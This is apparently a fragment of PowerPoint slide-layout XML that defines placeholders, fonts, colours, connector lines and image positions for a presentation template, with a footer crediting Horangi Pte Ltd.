          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="18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8" name="Shape 188"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4711700" y="1441446"/>
            <a:ext cx="3975000" cy="1562100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="2000"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="10000" b="1"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9" name="Shape 189"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4981576" y="3003550"/>
            <a:ext cx="3435299" cy="831900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="18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190" name="Shape 190"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4572000" y="1441446"/>
            <a:ext cx="0" cy="2394000"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="191" name="Shape 191"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="752075"/>
            <a:ext cx="8229600" cy="498900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Lora"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lor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457200" y="752075"/>
            <a:ext cx="8229600" cy="498900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Lora"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>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94" name="Shape 194"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457200" y="1250946"/>
            <a:ext cx="8229600" cy="2216100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="2800"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="14000" b="1"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5" name="Shape 195"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="457199" y="4767262"/>
            <a:ext cx="6000900" cy="273900"/>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a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" i="1">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t>7</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="ko" sz="700" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="dk1"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:rPr>
              <a:t> Horangi Pte Ltd</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="196" name="Shape 196"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6572250" y="4767262"/>
            <a:ext cx="2114700" cy="2739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
        <p:nvSpPr>
          <p:cNvPr id="197" name="Shape 197"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="2320925" y="3467100"/>
            <a:ext cx="4502100" cy="831900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="22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Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent2"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 23"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="Shape 24"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="0"/>
            <a:ext cx="9144000" cy="5143499"/>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0_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="lt1"/>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ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1924050"/>
            <a:ext cx="9144000" cy="32196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Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="32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02" name="Shape 202"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="9144000" cy="1923900"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="b" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="440"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="accent2"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="2200" b="0" i="1" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:schemeClr val="accent2"/>
                </a:solidFill>
                <a:latin typeface="Lora"/>
                <a:ea typeface="Lora"/>
                <a:cs typeface="Lora"/>
                <a:sym typeface="Lora"/>
              </a:defRPr>
            </a:lvl1pPr>
            <a:lvl2pPr marL="457200" marR="0" lvl="1" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="360"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1800" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl2pPr>
            <a:lvl3pPr marL="914400" marR="0" lvl="2" indent="0" algn="l" rtl="0">
              <a:spcBef>
                <a:spcPts val="320"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="8A8A8C"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="1600" b="0" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="8A8A8C"/>
                </a:solidFill>
                <a:latin typeface="Montserrat"/>
                <a:ea typeface="Montserrat"/>
                <a:cs typeface="Montserrat"/>
                <a:sym typeface="Montserrat"/>
              </a:defRPr>
            </a:lvl3pPr>
            <a:lvl4pPr marL="1371600" marR="0" lvl="3"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4pPr>
            <a:lvl5pPr marL="1828800" marR="0" lvl="4"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5pPr>
            <a:lvl6pPr marL="2286000" marR="0" lvl="5"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6pPr>
            <a:lvl7pPr marL="2743200" marR="0" lvl="6"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7pPr>
            <a:lvl8pPr marL="3200400" marR="0" lvl="7"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8pPr>
            <a:lvl9pPr marL="3657600" marR="0" lvl="8"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203"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="204" name="Shape 204"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="457200"/>
            <a:ext cx="9144000" cy="914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pic>
        <p:nvPicPr>
          <p:cNvPr id="205" name="Shape 205"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="537066" y="1716753"/>
            <a:ext cx="785100" cy="785100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="206" name="Shape 206"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId3">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="2052859" y="1716753"/>
            <a:ext cx="583200" cy="785100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="207" name="Shape 207"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId4">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="3366758" y="1716753"/>
            <a:ext cx="785100" cy="785100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="208" name="Shape 208"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId5">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4889621" y="1716753"/>
            <a:ext cx="785100" cy="785100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="209" name="Shape 209"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId6">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="6408735" y="1716753"/>
            <a:ext cx="665400" cy="785100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="210" name="Shape 210"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId7">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="7794317" y="1709276"/>
            <a:ext cx="800100" cy="800100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="211" name="Shape 211"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381000" y="2598276"/>
            <a:ext cx="1097400" cy="183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body" idx="2"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1795846" y="2598276"/>
            <a:ext cx="1097400" cy="183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body" idx="3"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3210691" y="2598276"/>
            <a:ext cx="1097399" cy="183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4" name="Shape 214"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="4"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733553" y="2598276"/>
            <a:ext cx="1097400" cy="183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5" name="Shape 215"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="5"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6192848" y="2598276"/>
            <a:ext cx="1097400" cy="183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6" name="Shape 216"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="6"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645728" y="2598276"/>
            <a:ext cx="1097400" cy="1830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7" name="Shape 217"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="7"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="381001" y="2957973"/>
            <a:ext cx="1097400" cy="10161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8" name="Shape 218"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="8"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1795846" y="2957973"/>
            <a:ext cx="1097400" cy="10161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9" name="Shape 219"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="9"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3210691" y="2957973"/>
            <a:ext cx="1097399" cy="10161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0" name="Shape 220"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="13"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4733553" y="2957973"/>
            <a:ext cx="1097400" cy="10161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1" name="Shape 221"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="14"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6192848" y="2957973"/>
            <a:ext cx="1097400" cy="10161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2" name="Shape 222"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="15"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7645728" y="2957973"/>
            <a:ext cx="1097400" cy="1016100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="t" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="200"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Arial"/>
              <a:buNone/>
              <a:defRPr sz="10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23" name="Shape 223"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1631950" y="1618123"/>
            <a:ext cx="0" cy="2444700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="224" name="Shape 224"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="3054350" y="1618123"/>
            <a:ext cx="0" cy="2444700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="225" name="Shape 225"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4527550" y="1618123"/>
            <a:ext cx="0" cy="2444700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="226" name="Shape 226"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6013450" y="1618123"/>
            <a:ext cx="0" cy="2444700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>
            </a:solidFill>
            <a:prstDash val="solid"/>
            <a:round/>
            <a:headEnd type="none" w="med" len="med"/>
            <a:tailEnd type="none" w="med" len="med"/>
          </a:ln>
        </p:spPr>
      </p:cxnSp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="227" name="Shape 227"/>
          <p:cNvCxnSpPr/>
          <p:nvPr/>
        </p:nvCxnSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7473950" y="1618123"/>
            <a:ext cx="0" cy="2444700"/>
          </a:xfrm>
          <a:prstGeom prst="straightConnector1">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln w="9525" cap="flat" cmpd="sng">
            <a:solidFill>
              <a:srgbClr val="BFBFBF"/>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9_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="accent1"/>
        </a:solidFill>
        <a:effectLst/>
      </p:bgPr>
    </p:bg>
    <p:spTree>
      <p:nvGrpSpPr>
        <p:cNvPr id="1" name="Shape 228"/>
        <p:cNvGrpSpPr/>
        <p:nvPr/>
      </p:nvGrpSpPr>
      <p:grpSpPr>
        <a:xfrm>
          <a:off x="0" y="0"/>
          <a:ext cx="0" cy="0"/>
          <a:chOff x="0" y="0"/>
          <a:chExt cx="0" cy="0"/>
        </a:xfrm>
      </p:grpSpPr>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="229" name="Shape 229"/>
          <p:cNvPicPr preferRelativeResize="0"/>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill rotWithShape="1">
          <a:blip r:embed="rId2">
            <a:alphaModFix/>
          </a:blip>
          <a:srcRect/>
          <a:stretch/>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="189027" y="642637"/>
            <a:ext cx="8766000" cy="4429800"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="230" name="Shape 230"/>
          <p:cNvSpPr txBox="1">
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="ctrTitle"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="0" y="1"/>
            <a:ext cx="9144000" cy="857100"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:noFill/>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91425" tIns="91425" rIns="91425" bIns="91425" anchor="ctr" anchorCtr="0"/>
          <a:lstStyle>
            <a:lvl1pPr marL="0" marR="0" lvl="0" indent="0" algn="ctr" rtl="0">
              <a:spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="20252D"/>
              </a:buClr>
              <a:buFont typeface="Montserrat"/>
              <a:buNone/>
              <a:defRPr sz="2000" b="1" i="0" u="none" strike="noStrike" cap="none">
                <a:solidFill>
                  <a:srgbClr val="20252D"/>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31" name="Shape 231"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1980950" y="1971075"/>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232" name="Shape 232"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="926850" y="2106749"/>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233" name="Shape 233"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6787900" y="3239061"/>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234" name="Shape 234"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="6866336" y="2106750"/>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235" name="Shape 235"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4008837" y="1700350"/>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
        <p:nvSpPr>
          <p:cNvPr id="236" name="Shape 236"/>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7844236" y="3306898"/>
            <a:ext cx="156875" cy="135675"/>
          </a:xfrm>
          <a:prstGeom prst="flowChartMerge">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="000000"/>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spcBef>
                <a:spcPts val="0"/>
              </a:spcBef>
              <a:buClr>
                <a:schemeClr val="dk1"/>
              </a:buClr>
              <a:buFont typeface="Calibri"/>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6_Title Slide">
    <p:bg>
      <p:bgPr>
        <a:solidFill>
          <a:schemeClr val="dk1"/>
